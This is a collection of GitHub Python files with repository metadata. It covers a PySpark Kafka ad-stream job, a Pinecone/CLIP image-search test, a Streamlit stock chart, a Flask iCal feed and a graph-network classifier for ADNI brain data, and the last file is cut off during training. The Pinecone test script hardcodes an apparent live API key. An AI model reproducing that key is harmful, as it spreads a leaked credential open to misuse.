+{"seq_id": "2166766080", "text": "from create_session import get_spark_object\nimport get_all_variable as gav\nfrom udf import process_message_udf\nfrom mysql_load import mysql_connection\nfrom pyspark.sql.functions import row_number, col, hour, when, udf, desc\nfrom pyspark.sql.window import Window\nfrom preprocessdata import process_data\n\ndef main():\n #creating a spark object.\n spark = get_spark_object(gav.appName)\n\n #adding \"C:\\Bigdata\\spark-3.1.2-bin-hadoop3.2\\jars\\mysql-connector-java-8.0.12.jar\" jar into spark-jars folder.\n #advertiserDf loading from mysql.\n advertiser_df = mysql_connection(spark,gav.advertiser_tab)\n\n #loads the adslot_df table from mysql into dataframe\n adslot_df = mysql_connection(spark,gav.adslot)\n\n #reading kafka_streaming\n kafka_params = {\n \"kafka.bootstrap.servers\": gav.bootstrap_server,\n \"subscribe\": gav.topic,\n \"startingOffsets\": \"earliest\"}\n kafka_messages = (spark.readStream.format(\"kafka\")\n .options(**kafka_params)\n .load()\n )\n #register the udf\n process_df = kafka_messages.select(process_message_udf(kafka_messages).alias(\"processed_data\"))\n\n # Join the message data with advertiser and adslot data\n joined_df = process_df.join(advertiser_df, [\"advertiserId\"], \"left\").join(adslot_df, [\"adslotId\"], \"left\")\n\n # filter the record using window function and rank the data (latest data start from 1)\n win = Window.partitionBy(\"uniqId\", hour(\"date_time\")).orderBy(desc(\"date_time\"))\n joined_df = joined_df.withColumn(\"row_num\", row_number().over(win))\n\n joined_df = joined_df.filter(col(\"row_num\") == 1).dropDuplicates([\"uniqId\", \"hour\"])\n\n # 2.Apply the specified conditions\n process_df = process_data(joined_df)\n\n #writing output to the console\n query = (process_df.writeStream\n .outputMode(\"append\")\n .format(\"console\")\n .start()\n )\n\n # # Await the termination of the streaming query\n query.awaitTermination()\n\n #writing output to the HDFS. #Here I am writing to local\n # query1 = (process_df.writeStream\n # .outputMode(\"append\")\n # .format(\"json\")\n # .option(\"path\", \"file:///D://python record\")\n # .option(\"checkpointLocation\", \"D://python record//chk\")\n # .start()\n # )\n #\n\n # query1.awaitTermination() #\n\n # # Start the streaming query and wait for it to terminate #\n\nif __name__ == '__main__':\n main()\n", "repo_name": "bhagwat07/pyspark_kafka_assigment", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 2522, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "create_session.get_spark_object", "line_number": 11, "usage_type": "call"}, {"api_name": "get_all_variable.appName", "line_number": 11, "usage_type": "attribute"}, {"api_name": "mysql_load.mysql_connection", "line_number": 15, "usage_type": "call"}, {"api_name": "get_all_variable.advertiser_tab", "line_number": 15, "usage_type": "attribute"}, {"api_name": "mysql_load.mysql_connection", "line_number": 18, "usage_type": "call"}, {"api_name": "get_all_variable.adslot", "line_number": 18, "usage_type": "attribute"}, {"api_name": "get_all_variable.bootstrap_server", "line_number": 22, "usage_type": "attribute"}, {"api_name": "get_all_variable.topic", "line_number": 23, "usage_type": "attribute"}, {"api_name": "udf.process_message_udf", "line_number": 30, "usage_type": "call"}, {"api_name": "pyspark.sql.window.Window.partitionBy", "line_number": 36, "usage_type": "call"}, {"api_name": "pyspark.sql.window.Window", "line_number": 36, "usage_type": "name"}, {"api_name": "pyspark.sql.functions.hour", "line_number": 36, "usage_type": "call"}, {"api_name": "pyspark.sql.functions.desc", "line_number": 36, "usage_type": "call"}, {"api_name": "pyspark.sql.functions.row_number", "line_number": 37, "usage_type": "call"}, {"api_name": "pyspark.sql.functions.col", "line_number": 39, "usage_type": "call"}, {"api_name": "preprocessdata.process_data", "line_number": 42, "usage_type": "call"}]}
+{"seq_id": "71462711448", "text": "import pinecone\nimport boto3\nfrom PIL import Image\nimport clip\nimport torch\nimport uuid\nimport os\nimport joblib\n\npinecone.init(api_key=\"4ccf9bfd-91b0-4ed7-8b3c-6f11c9b2fcf0\", environment=\"us-east-1-aws\")\ns3 = boto3.client('s3', \n region_name='us-east-1', \n aws_access_key_id='###########', \n aws_secret_access_key='##########')\nindex = pinecone.Index(\"panoptes-frame-vectors-shadow\")\nmodel, preprocess = clip.load(\"ViT-B/32\", device=\"cpu\")\nmodel_obj = {\"model\": model, \"preprocess_fn\": preprocess}\npreprocess = model_obj['preprocess_fn']\nmodel = model_obj['model']\nresponse = s3.list_objects(Bucket=\"user-5ce111fe-7ac9-4bdc-8f47-93fe84d5ac0a\")\nobjects = response['Contents']\nprint(objects)\nprediction_output = {}\nprediction_output[\"vectors\"] = []\nprediction_output[\"user_id\"] = \"user-5ce111fe-7ac9-4bdc-8f47-93fe84d5ac0a\"\nfor obj in objects:\n s3.download_file(\"user-5ce111fe-7ac9-4bdc-8f47-93fe84d5ac0a\", obj['Key'], 'temp_image.jpg')\n image = Image.open('temp_image.jpg')\n image_input = preprocess(image).unsqueeze(0).to(\"cpu\")\n with torch.no_grad():\n image_features = model.encode_image(image_input)\n frame_id = str(uuid.uuid4())\n vector_dict = {\n 'id' : frame_id,\n 'values' : image_features.cpu().numpy().tolist()[0],\n 'metadata': {\n 'video' : 'images_10secsimple_cup_beach.mp4',\n 'image_name' : obj['Key']\n }\n }\n # print(vector_dict)\n prediction_output[\"vectors\"].append(vector_dict)\n\njoblib.dump(prediction_output, \"vector_dump.z\")\nindex.upsert(prediction_output[\"vectors\"], namespace=prediction_output[\"user_id\"], show_progress=True)\n\nquery_tokens = clip.tokenize([\"Cup on a table\"]).to(\"cpu\")\nwith torch.no_grad():\n query_features = model.encode_text(query_tokens)\nquery_features = query_features.cpu().numpy().tolist()[0]\n\n\nquery_response = index.query(\n namespace='user-5ce111fe-7ac9-4bdc-8f47-93fe84d5ac0a',\n top_k=5,\n include_metadata=True,\n vector=query_features,\n filter={\n 'video': {'$in': ['images_10secsimple_cup_beach.mp4']}\n }\n)\n\nprint(query_response)", "repo_name": "Vi-Sri/panoptes-service", "sub_path": "panoptes-app/backend/test_pinecone.py", "file_name": "test_pinecone.py", "file_ext": "py", "file_size_in_byte": 2132, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "pinecone.init", "line_number": 10, "usage_type": "call"}, {"api_name": "boto3.client", "line_number": 11, "usage_type": "call"}, {"api_name": "pinecone.Index", "line_number": 15, "usage_type": "call"}, {"api_name": "clip.load", "line_number": 16, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 28, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 28, "usage_type": "name"}, {"api_name": "torch.no_grad", "line_number": 30, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 32, "usage_type": "call"}, {"api_name": "joblib.dump", "line_number": 44, "usage_type": "call"}, {"api_name": "clip.tokenize", "line_number": 47, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 48, "usage_type": "call"}]}
+{"seq_id": "37616836948", "text": "import yfinance as yf\r\nimport streamlit as st\r\nimport pandas as pd\r\n\r\nst.write(\"\"\"\r\n\r\n# NVDA Stock Ticker\r\n\r\nThe last 3 years of NVDA closing price is shown below. NIVIDIA CORP = 'NVDA'\r\n\r\n\"\"\")\r\n\r\ntickerSymbol = 'NVDA'\r\n\r\ntickerData = yf.Ticker(tickerSymbol)\r\n\r\ntickerDf = tickerData.history(period = '1d', start = '2018-1-1', end = '2021-1-1')\r\n#.Open, .Close, .Volume, .Dividends, .StockSplit \r\n\r\nst.line_chart(tickerDf.Close)\r\n\r\nst.write(\"\"\"\r\n\r\nThe last 3 years of trade volume for NVDA is shown below.\r\n\r\n\"\"\")\r\n\r\nst.line_chart(tickerDf.Volume)\r\n", "repo_name": "Codename-SPYDER/Data-Projects", "sub_path": "Streamlit_Projects/Stonks.py", "file_name": "Stonks.py", "file_ext": "py", "file_size_in_byte": 549, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "streamlit.write", "line_number": 5, "usage_type": "call"}, {"api_name": "yfinance.Ticker", "line_number": 15, "usage_type": "call"}, {"api_name": "streamlit.line_chart", "line_number": 20, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 22, "usage_type": "call"}, {"api_name": "streamlit.line_chart", "line_number": 28, "usage_type": "call"}]}
+{"seq_id": "29761380593", "text": "from flask import Flask\nfrom icalendar import Calendar, Event\nfrom datetime import datetime\nfrom pytz import timezone\n\nfrom app import dation_service\n\napp = Flask(__name__)\napp.config.from_object('config.Config')\n\n\n@app.route('/calendar.ics')\ndef calendar_ics():\n ds_info = dation_service.get_driving_school_info(\n app.config[\"SOAP_ENDPOINT\"], app.config[\"SCHOOL_HANDLE\"])\n login_info = dation_service.student_login(ds_info,\n app.config[\"USERNAME\"],\n app.config[\"PASSWORD\"])\n\n planning = dation_service.get_student_planned_courses(ds_info, login_info)\n\n ds_address = dation_service.get_driving_school_address(\n ds_info, login_info)\n\n address = (f\"{ds_address.street} {ds_address.housenumber}, \"\n f\"{ds_address.zipcode} {ds_address.city}\")\n\n tz = timezone(\"Europe/Amsterdam\")\n\n cal = Calendar()\n cal.add('prodid', '-//Dation ICS feed//loriancoltof.nl//')\n cal.add('version', '2.0')\n\n cal.add('method', 'PUBLISH')\n cal.add('x-wr-calname', 'Rijles')\n\n for item in planning:\n event = Event()\n\n event.add('summary', item.name)\n event.add('dtstart', item.start_time.astimezone(tz))\n event.add('dtend', item.stop_time.astimezone(tz))\n event.add('dtstamp', datetime.now())\n\n event.add('description',\n f\"Instructeur: {item.instructor}\\n\"\n f\"Pakket: {item.course_info.type_name} \"\n f\"({item.course_info.category})\")\n event.add('location', address)\n\n cal.add_component(event)\n\n return cal.to_ical(), {\"Content-Type\": \"text/calendar\"}\n", "repo_name": "LorianColtof/Dation-iCal-Feed", "sub_path": "app/__init__.py", "file_name": "__init__.py", "file_ext": "py", "file_size_in_byte": 1687, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "flask.Flask", "line_number": 8, "usage_type": "call"}, {"api_name": "app.config.from_object", "line_number": 9, "usage_type": "call"}, {"api_name": "app.config", "line_number": 9, "usage_type": "attribute"}, {"api_name": "app.dation_service.get_driving_school_info", "line_number": 14, "usage_type": "call"}, {"api_name": "app.dation_service", "line_number": 14, "usage_type": "name"}, {"api_name": "app.config", "line_number": 15, "usage_type": "attribute"}, {"api_name": "app.dation_service.student_login", "line_number": 16, "usage_type": "call"}, {"api_name": "app.dation_service", "line_number": 16, "usage_type": "name"}, {"api_name": "app.config", "line_number": 17, "usage_type": "attribute"}, {"api_name": "app.config", "line_number": 18, "usage_type": "attribute"}, {"api_name": "app.dation_service.get_student_planned_courses", "line_number": 20, "usage_type": "call"}, {"api_name": "app.dation_service", "line_number": 20, "usage_type": "name"}, {"api_name": "app.dation_service.get_driving_school_address", "line_number": 22, "usage_type": "call"}, {"api_name": "app.dation_service", "line_number": 22, "usage_type": "name"}, {"api_name": "pytz.timezone", "line_number": 28, "usage_type": "call"}, {"api_name": "icalendar.Calendar", "line_number": 30, "usage_type": "call"}, {"api_name": "icalendar.Event", "line_number": 38, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 43, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 43, "usage_type": "name"}, {"api_name": "app.route", "line_number": 12, "usage_type": "call"}]}
+{"seq_id": "6458332991", "text": "import argparse\nimport sys\nsys.setrecursionlimit(300000)\n\nimport time\nimport copy\nimport os\nimport itertools\nimport random\n\nimport numpy as np\nimport pandas as pd\nimport scipy.io\n\nfrom sklearn.metrics import mean_absolute_error #여기도 바꿔야 함!!\n\nimport torch\nimport torch.nn as nn\nfrom torch.utils.data import TensorDataset, Dataset, DataLoader\nimport torch.optim as optim\nfrom torch.autograd import Variable\n\nfrom tqdm.notebook import tqdm\n\nfrom sklearn.preprocessing import MinMaxScaler\n\nparser = argparse.ArgumentParser()\nargs = parser.parse_args(\"\")\nargs.seed = 123\nargs.val_size = 0.1\nargs.test_size = 0.1\nargs.shuffle = True\n\n################################################## STEP 1. data preparation ################################################\n# 1-1 data load\ntarg_folder_raw='../ADNI-struct-count' #이 폴더가 있는 곳으로 경로 설정 해주세요\nnode_feat_csv = pd.read_csv(os.path.join(targ_folder_raw, 'node-feat.csv.gz'), header=None)\ngraph_label_csv = pd.read_csv(os.path.join(targ_folder_raw, 'graph-label.csv.gz'), header=None)\nconmat = scipy.io.loadmat('../data/adni_connectome_aparc_count.mat') #이 파일이 있는 곳으로 경로 설정 해주세요.\nlist_adj = conmat['connectome_aparc0x2Baseg_count'].T # (179, 84, 84)\n\n\n# 1-2 label scaling - pytorch label starts from 0.\nclass2idx = {\n 3:2,\n 2:1,\n 1:0\n}\n\nidx2class = {v: k for k, v in class2idx.items()}\n\ngraph_label_csv.replace(class2idx, inplace=True) #이제 0, 1, 2로 encoding 되어있음.\n\n\n# 1-3 feature scaling\nmm = MinMaxScaler()\n\n### (1) node feat scaling + to numpy\nlist_feature = mm.fit_transform(node_feat_csv).reshape(179,84,2)\n\n### (2) graph label to numpy\nlist_NIH_score = graph_label_csv.to_numpy()\n\n### (3) edge feature threshold + scaling (이미 numpy였음)\n\n##### (3-1) threshold as 20\nfor i in range(list_adj.shape[0]):\n for j in range(list_adj.shape[1]):\n for k in range(list_adj.shape[2]):\n if list_adj[i][j][k] <=20:\n list_adj[i][j][k] = 0\n\n##### (3-2) scaling with minmax scaler\nlist_adj = mm.fit_transform(list_adj.reshape(list_adj.shape[0],-1)).reshape(list_adj.shape[0], 84, 84) \n\n\n################################################## STEP 2. build model ################################################\n\n# 2-1 data loader\nclass GCNDataset(Dataset):\n def __init__(self, list_feature, list_adj, list_NIH_score):\n self.list_feature = list_feature\n self.list_adj = list_adj\n self.list_NIH_score = list_NIH_score\n \n def __len__(self):\n return len(self.list_feature)\n \n def __getitem__(self, index):\n return self.list_feature[index], self.list_adj[index], self.list_NIH_score[index]\n\n\nclass GCNAugmentedDataset(Dataset):\n def __init__(\n self,\n list_feature,\n list_adj,\n list_NIH_score,\n feat_mask_apply_prob: float = 0.5, # 매 instance 마다 feature masking augmentation 적용할 확률\n feat_mask_prob: float = 0.1, # feature masking 적용할 때 masking 할 노드의 percentage\n edge_perturb_apply_prob: float = 0.5, # 매 instance 마다 edge perturbation augmentation 적용할 확률\n edge_perturb_prob: float = 0.1, # edge perturbation 적용할 때 perturb 할 edge 의 percentage\n node_drop_apply_prob: float = 0.5, # 매 instance 마다 node drop augmentation 적용할 확률\n node_drop_prob: float = 0.1, # node drop 적용할 때 masking 할 노드의 percentage\n subgraph_apply_prob: float = 0.5, # 매 instance 마다 subgraph augmentation 적용할 확률\n subgraph_prob: float = 0.1, # subgraph 에서 제외될 노드의 percentage\n seed: int = 0, # random seed for reproducibility\n ):\n self.list_feature = list_feature.astype(np.float32)\n self.list_adj = list_adj.astype(np.float32)\n self.list_NIH_score = list_NIH_score\n assert all(0.0 <= p <= 1.0\n for p in [feat_mask_apply_prob, feat_mask_prob,\n edge_perturb_apply_prob, edge_perturb_prob,\n node_drop_apply_prob, node_drop_prob,\n subgraph_apply_prob, subgraph_prob])\n self.feat_mask_apply_prob = feat_mask_apply_prob\n self.feat_mask_prob = feat_mask_prob\n self.edge_perturb_apply_prob = edge_perturb_apply_prob\n self.edge_perturb_prob = edge_perturb_prob\n self.node_drop_apply_prob = node_drop_apply_prob\n self.node_drop_prob = node_drop_prob\n self.subgraph_apply_prob = subgraph_apply_prob\n self.subgraph_prob = subgraph_prob\n self.rng = np.random.default_rng(seed)\n num_nodes = list_feature[0].shape[0]\n all_edges = []\n for i in range(num_nodes):\n for j in range(i+1, num_nodes):\n all_edges.append((i, j))\n self.all_edges = np.array(all_edges)\n\n def __len__(self):\n return len(self.list_feature)\n\n def __getitem__(self, index):\n orig_feat, orig_adj, orig_score = self.list_feature[index], self.list_adj[index], self.list_NIH_score[index]\n\n aug_feat = np.copy(orig_feat)\n aug_adj = np.copy(orig_adj)\n num_nodes = orig_feat.shape[0]\n feature_dim = orig_feat.shape[1]\n\n if self.rng.random() < self.subgraph_apply_prob:\n num_subgraph_nodes = int(num_nodes * (1 - self.subgraph_prob))\n subgraph_nodes = []\n node_sample_prob = np.ones(num_nodes) / num_nodes\n\n while len(subgraph_nodes) < num_subgraph_nodes:\n center_node = self.rng.choice(num_nodes, 1, p=node_sample_prob)[0]\n connected_nodes = self.get_all_connected_nodes(index, center_node)\n subgraph_nodes.extend(connected_nodes)\n node_sample_prob[connected_nodes] = 0.0\n prob_sum = node_sample_prob.sum()\n if prob_sum > 0:\n node_sample_prob = node_sample_prob / node_sample_prob.sum()\n subgraph_nodes = set(subgraph_nodes[:num_subgraph_nodes])\n deleted_nodes = np.array([n for n in range(num_nodes) if n not in subgraph_nodes])\n aug_feat[deleted_nodes] = 0.0\n if self.rng.random() < self.node_drop_apply_prob:\n num_drop_nodes = int(num_nodes * self.node_drop_prob)\n drop_nodes = self.rng.choice(num_nodes, num_drop_nodes, replace=False)\n if len(drop_nodes) > 0:\n aug_feat[drop_nodes] = 0.0\n if self.rng.random() < self.feat_mask_apply_prob:\n # apply feature masking\n num_mask = int(num_nodes * self.feat_mask_prob)\n mask_indices = self.rng.choice(num_nodes, num_mask, replace=False)\n if len(mask_indices) > 0:\n aug_feat[mask_indices] = self.rng.random((num_mask, feature_dim)) # 이젠 0 대신 noise로 mask\n if self.rng.random() < self.edge_perturb_apply_prob:\n # apply feature masking\n num_perturb = int(num_nodes * (num_nodes-1) * self.edge_perturb_prob * 0.5)\n xy_indices = self.all_edges[self.rng.choice(self.all_edges.shape[0], num_perturb, replace=False)]\n x_indices = xy_indices[:, 0]\n y_indices = xy_indices[:, 1]\n perturbed_values = self.rng.random(num_perturb)\n if len(x_indices) > 0:\n aug_adj[x_indices, y_indices] = perturbed_values\n aug_adj[y_indices, x_indices] = perturbed_values\n return orig_feat, orig_adj, aug_feat, aug_adj, orig_score\n\n def neighbors(self, index, node):\n return np.where(self.list_adj[index][node] > 0)[0]\n\n def get_all_connected_nodes(self, index, node):\n visited = set()\n self._get_all_connected_nodes(index, node, visited)\n return sorted(visited) # sort for reproducibility\n\n def _get_all_connected_nodes(self, index, node, visited):\n visited.add(node)\n for neighbor in self.neighbors(index, node):\n if neighbor in visited:\n continue\n self._get_all_connected_nodes(index, neighbor, visited)\n\n\ndef partition(list_feature, list_adj, list_NIH_score, args):\n num_total = len(list_feature)\n num_train = int(num_total * (1 - args.test_size - args.val_size))\n num_val = int(num_total * args.val_size)\n num_test = int(num_total * args.test_size)\n \n feature_train = list_feature[:num_train]\n adj_train = list_adj[:num_train]\n NIH_score_train = list_NIH_score[:num_train]\n feature_val = list_feature[num_train:num_train + num_val]\n adj_val = list_adj[num_train:num_train + num_val]\n NIH_score_val = list_NIH_score[num_train:num_train + num_val]\n feature_test = list_feature[num_total - num_test:]\n adj_test = list_adj[num_total - num_test:]\n NIH_score_test = list_NIH_score[num_total - num_test:]\n \n train_set = GCNDataset(feature_train, adj_train, NIH_score_train)\n val_set = GCNDataset(feature_val, adj_val, NIH_score_val)\n test_set = GCNDataset(feature_test, adj_test, NIH_score_test)\n \n partition = {\n 'train' : train_set,\n 'val' : val_set,\n 'test': test_set\n }\n \n return partition\n\n# 2-2 module\nclass SkipConnection(nn.Module):\n \n def __init__(self, in_dim, out_dim):\n super(SkipConnection, self).__init__()\n \n self.in_dim = in_dim\n self.out_dim = out_dim\n \n self.linear = nn.Linear(in_dim, out_dim, bias=False)\n \n def forward(self, in_x, out_x):\n if (self.in_dim != self.out_dim): # dimension이 다르면 dimension을 맞춰주는 작업\n in_x = self.linear(in_x)\n out = in_x + out_x\n return out\n \nclass GatedSkipConnection(nn.Module):\n \n def __init__(self, in_dim, out_dim):\n super(GatedSkipConnection, self).__init__()\n \n self.in_dim = in_dim\n self.out_dim = out_dim\n \n self.linear = nn.Linear(in_dim, out_dim, bias=False)\n self.linear_coef_in = nn.Linear(out_dim, out_dim)\n self.linear_coef_out = nn.Linear(out_dim, out_dim)\n self.sigmoid = nn.Sigmoid()\n \n def forward(self, in_x, out_x):\n if (self.in_dim != self.out_dim):\n in_x = self.linear(in_x)\n z = self.gate_coefficient(in_x, out_x)\n out = torch.mul(z, out_x) + torch.mul(1.0 - z, in_x)\n return out\n \n def gate_coefficient(self, in_x, out_x):\n x1 = self.linear_coef_in(in_x)\n x2 = self.linear_coef_out(out_x)\n return self.sigmoid(x1+x2)\n \nclass Attention(nn.Module):\n \n def __init__(self, in_dim, output_dim, num_head):\n super(Attention, self).__init__()\n \n self.num_head = num_head\n self.atn_dim = output_dim // num_head\n \n self.linears = nn.ModuleList()\n self.corelations = nn.ParameterList()\n for i in range(self.num_head):\n self.linears.append(nn.Linear(in_dim, self.atn_dim))\n corelation = torch.FloatTensor(self.atn_dim, self.atn_dim)\n nn.init.xavier_uniform_(corelation)\n self.corelations.append(nn.Parameter(corelation))\n \n self.tanh = nn.Tanh()\n \n def forward(self, x, adj):\n heads = list()\n for i in range(self.num_head):\n x_transformed = self.linears[i](x)\n alpha = self.attention_matrix(x_transformed, self.corelations[i], adj)\n x_head = torch.matmul(alpha, x_transformed)\n heads.append(x_head)\n output = torch.cat(heads, dim=2)\n return output\n \n def attention_matrix(self, x_transformed, corelation, adj):\n x = torch.einsum('akj, ij->aki', (x_transformed, corelation))\n alpha = torch.matmul(x, torch.transpose(x_transformed, 1, 2))\n alpha = torch.mul(alpha, adj)\n alpha = self.tanh(alpha)\n return alpha\n \nclass GCNLayer(nn.Module):\n \n def __init__(self, in_dim, out_dim, n_node, act=None, bn=False, atn=False, num_head=1, dropout=0):\n super(GCNLayer, self).__init__()\n \n self.use_bn = bn\n self.use_atn = atn\n self.linear = nn.Linear(in_dim, out_dim)\n nn.init.xavier_uniform_(self.linear.weight)\n self.bn = nn.BatchNorm1d(n_node)\n self.attention = Attention(out_dim, out_dim, num_head)\n self.activation = act\n self.dropout_rate = dropout\n self.dropout = nn.Dropout2d(self.dropout_rate)\n \n def forward(self, x, adj):\n out = self.linear(x)\n if self.use_atn:\n out = self.attention(out, adj)\n else:\n out = torch.matmul(adj, out)\n if self.use_bn:\n out = self.bn(out)\n if self.activation != None:\n out = self.activation(out)\n if self.dropout_rate > 0:\n out = self.dropout(out)\n return out, adj\n \nclass GCNBlock(nn.Module):\n def __init__(self, n_layer, in_dim, hidden_dim, out_dim, n_node, bn=True, atn=True, num_head=1, sc='gsc', dropout=0):\n super(GCNBlock, self).__init__()\n \n self.layers = nn.ModuleList()\n for i in range(n_layer):\n self.layers.append(GCNLayer(in_dim if i==0 else hidden_dim,\n out_dim if i==n_layer-1 else hidden_dim,\n n_node,\n nn.ReLU() if i != n_layer-1 else None,\n bn,\n atn,\n num_head,\n dropout))\n \n self.relu = nn.ReLU()\n if sc=='gsc':\n self.sc = GatedSkipConnection(in_dim, out_dim)\n elif sc =='sc':\n self.sc = SkipConnection(in_dim, out_dim)\n elif sc=='no':\n self.sc = None\n else:\n assert False, \"Wrong sc type.\"\n \n def forward(self, x, adj):\n residual = x\n for i, layer in enumerate(self.layers):\n out, adj = layer((x if i==0 else out), adj)\n if self.sc != None:\n out = self.sc(residual, out)\n out = self.relu(out)\n return out, adj\n \nclass ReadOut(nn.Module):\n \n def __init__(self, in_dim, out_dim, act=None):\n super(ReadOut, self).__init__()\n \n self.in_dim = in_dim\n self.out_dim = out_dim\n \n self.linear = nn.Linear(self.in_dim,\n self.out_dim)\n nn.init.xavier_uniform_(self.linear.weight) # activation function 따라 다른 방식의 initialization을 쓸 수 있음.\n self.activation = act\n \n def forward(self, x):\n out = self.linear(x)\n out = torch.sum(out, 1)\n if self.activation != None:\n out = self.activation(out)\n return out\n \nclass Predictor(nn.Module):\n \n def __init__(self, in_dim, out_dim, act=None):\n super(Predictor, self).__init__()\n \n self.in_dim = in_dim\n self.out_dim = out_dim\n \n self.linear = nn.Linear(self.in_dim,\n self.out_dim)\n nn.init.xavier_uniform_(self.linear.weight)\n self.activation = act\n \n def forward(self, x):\n out = self.linear(x)\n if self.activation != None:\n out = self.activation(out)\n return out\n \n\n# 2-3 Model \nclass GCNNet(nn.Module):\n def __init__(self, args):\n super(GCNNet, self).__init__()\n \n self.blocks = nn.ModuleList()\n for i in range(args.n_block):\n self.blocks.append(GCNBlock(args.n_layer,\n args.in_dim if i==0 else args.hidden_dim,\n args.hidden_dim,\n args.hidden_dim,\n args.n_node,\n args.bn,\n args.atn,\n args.num_head,\n args.sc,\n args.dropout\n ))\n self.readout = ReadOut(args.hidden_dim,\n args.pred_dim1,\n act=nn.ReLU())\n self.pred1 = Predictor(args.pred_dim1,\n args.pred_dim2,\n act=nn.ReLU())\n self.pred2 = Predictor(args.pred_dim2,\n args.pred_dim3,\n act=nn.Tanh())\n self.pred3 = Predictor(args.pred_dim3,\n args.out_dim)\n \n def forward(self, x, adj):\n for i, block in enumerate(self.blocks):\n out, adj = block((x if i==0 else out), adj)\n out = self.readout(out)\n out = self.pred1(out)\n out = self.pred2(out)\n out = self.pred3(out)\n \n return out #3개짜리 내보냄\n\n \n################################################## STEP 3. utils for train, valid, test ################################################\n \ndef multi_acc(y_pred, y_test):\n y_pred = torch.Tensor(y_pred)\n y_test = torch.Tensor(y_test) \n #print('y_test:', y_test) #0, 1, 2로 되어있음!\n y_pred_softmax = torch.log_softmax(y_pred, dim=0)\n #print('y_pred_softmax:', y_pred_softmax)\n _, y_pred_tags = torch.max(y_pred_softmax, dim=0)\n #print('y_pred_tags:', y_pred_tags) # 여기서 0, 1, 2가 나와야 함..ㅎㅎ..\n \n correct_pred = (y_pred_tags == y_test).float()\n acc = correct_pred.sum() / len(correct_pred)\n \n acc = torch.round(acc * 100)\n \n return acc\n\ndef train(model, device, optimizer, criterion, data_train, bar, args):\n epoch_train_loss = 0\n for i, batch in enumerate(data_train):\n list_feature = batch[0].clone().to(device).float().detach().requires_grad_(True)\n list_adj = batch[1].clone().to(device).float().detach().requires_grad_(True)\n #원형은... torch.tensor(batch[1]).to(device).float()\n list_NIH_score = batch[2].clone().to(device).float().detach().requires_grad_(True)\n list_NIH_score = list_NIH_score.view(-1, 1)\n list_NIH_score = list_NIH_score.type(torch.long)\n #print('shape of list_NIH_score is:', list_NIH_score.shape)\n #print('list_NIH_score is:', list_NIH_score)\n \n model.train()\n optimizer.zero_grad()\n list_pred_NIH_score = model(list_feature, list_adj)\n #print('shape of list_pred_NIH_score is:', list_pred_NIH_score.shape)\n\n list_pred_NIH_score.require_grad = False\n train_loss = criterion(list_pred_NIH_score, list_NIH_score.squeeze(dim=-1))\n #print('train loss is:', train_loss)\n epoch_train_loss += train_loss.item()\n train_loss.backward()\n optimizer.step()\n \n bar.update(len(list_feature))\n \n epoch_train_loss /= len(data_train)\n \n return model, epoch_train_loss\n\ndef validate(model, device, criterion, data_val, bar, args):\n epoch_val_loss = 0\n with torch.no_grad():\n for i, batch in enumerate(data_val):\n list_feature = batch[0].clone().to(device).float().detach().requires_grad_(True)\n list_adj = batch[1].clone().to(device).float().detach().requires_grad_(True)\n #원형은... torch.tensor(batch[1]).to(device).float()\n list_NIH_score = batch[2].clone().to(device).float().detach().requires_grad_(True)\n list_NIH_score = list_NIH_score.view(-1,1)\n list_NIH_score = list_NIH_score.type(torch.long)\n\n model.eval()\n list_pred_NIH_score = model(list_feature, list_adj)\n list_pred_NIH_score.require_grad = False\n val_loss = criterion(list_pred_NIH_score, list_NIH_score.squeeze(dim=-1))\n epoch_val_loss += val_loss.item()\n \n bar.update(len(list_feature))\n\n epoch_val_loss /= len(data_val)\n \n return model, epoch_val_loss\n\ndef test(model, device, data_test, args):\n model.eval()\n with torch.no_grad():\n NIH_score_total = list()\n pred_NIH_score_total = list()\n for i, batch in enumerate(data_test):\n list_feature = batch[0].clone().to(device).float().detach().requires_grad_(True)\n list_adj = batch[1].clone().to(device).float().detach().requires_grad_(True)\n #원형은... torch.tensor(batch[1]).to(device).float()\n list_NIH_score = batch[2].clone().to(device).float().detach().requires_grad_(True)\n NIH_score_total += list_NIH_score.tolist()\n list_NIH_score = list_NIH_score.view(-1,1)\n list_NIH_score = list_NIH_score.type(torch.long)\n\n list_pred_NIH_score = model(list_feature, list_adj)\n pred_NIH_score_total += list_pred_NIH_score.view(-1).tolist()\n\n #print('true label: ', NIH_score_total)\n #print('pred label: ', pred_NIH_score_total)\n acc = multi_acc(pred_NIH_score_total, NIH_score_total) ## 여기를 어떻게 바꿀까?\n #std = np.std(np.array(NIH_score_total)-np.array(pred_NIH_score_total))\n\n return acc, NIH_score_total, pred_NIH_score_total\n\ndef experiment(dict_partition, device, bar, args):\n time_start = time.time()\n \n model = GCNNet(args)\n model.to(device)\n\n \n if args.optim == 'Adam':\n optimizer = optim.Adam(model.parameters(),\n lr=args.lr,\n weight_decay=args.l2_coef)\n elif args.optim == 'RMSprop':\n optimizer = optim.RMSprop(model.parameters(),\n lr=args.lr,\n weight_decay=args.l2_coef)\n elif args.optim == 'SGD':\n optimizer = optim.SGD(model.parameters(),\n lr=args.lr,\n weight_decay=args.l2_coef)\n else:\n assert False, 'Undefined Optimizer Type'\n \n criterion = nn.CrossEntropyLoss().to(device)\n #criterion = nn.L1Loss(reduction = 'sum')\n scheduler = optim.lr_scheduler.StepLR(optimizer,\n step_size=args.step_size,\n gamma=args.gamma)\n\n list_train_loss = list()\n list_val_loss = list()\n\n data_train = DataLoader(dict_partition['train'], \n batch_size=args.batch_size,\n shuffle=args.shuffle)\n\n data_val = DataLoader(dict_partition['val'],\n batch_size=args.batch_size,\n shuffle=args.shuffle)\n\n for epoch in range(args.epoch):\n\n #scheduler.step() - 순서 변경! optimizer 다음에 오도록.\n model, train_loss = train(model, device, optimizer, criterion, data_train, bar, args)\n 